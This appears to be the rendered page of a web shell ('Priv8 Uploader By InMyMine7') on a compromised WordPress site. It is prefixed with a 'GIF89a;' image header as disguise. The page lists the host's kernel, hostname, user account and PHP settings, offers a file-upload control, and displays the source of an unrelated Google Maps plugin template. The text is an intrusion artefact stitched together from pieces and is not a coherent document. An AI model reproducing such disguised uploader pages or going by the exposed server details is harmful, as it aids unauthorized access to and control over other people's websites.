GIF89a;
Notice: Undefined index: in /home/bs3263/domains/poolq.ee/public_html/wp-content/plugins/classic-editor/classic-editor.php on line 3

Priv8 Uploader By InMyMine7

Linux bs3.beeserver.ee 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64
HEX
HEX
Server: Apache/2
System: Linux bs3.beeserver.ee 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64
User: bs3263 (524)
PHP: 7.3.5
Disabled: NONE
Upload Files
File: /home/bs3263/public_html/wp-content/plugins/google-maps/templates/admin/inline-popup.php
<?php
/**
 *
 */

$maps = Hugeit_Maps_Query::get_maps();

?>
<style>
    .tb_popup_form {
        position: relative;
        display: block;
    }

    .tb_popup_form li {
        display: block;
        height: 35px;
        width: 70%;
    }

    .tb_popup_form li label {
        float: left;
        width: 35%
    }

    .tb_popup_form li input {
        float: left;
        width: 60%;
    }

    .slider, .slider-container {
        display: block;
        position: relative;
        height: 35px;
        line-height: 35px;
    }


</style>
<div id="hugeit_maps" style="display:none;">
    <?php

    if( $maps && !empty($maps) ){
        Hugeit_Maps_Template_Loader::get_template('admin/inline-popup-form.php', array( 'maps' => $maps ));
    }else{
        printf(
            '<p>%s<a class="button" href="%s">%s</a></p>',
            __('You have not creted any maps', 'hugeit_maps'),
            admin_url('admin.php?page=hugeit_maps&task=create_new_map'),
            __( 'Create new Map', 'hugeit_maps' )
        );
    }

    ?>
</div>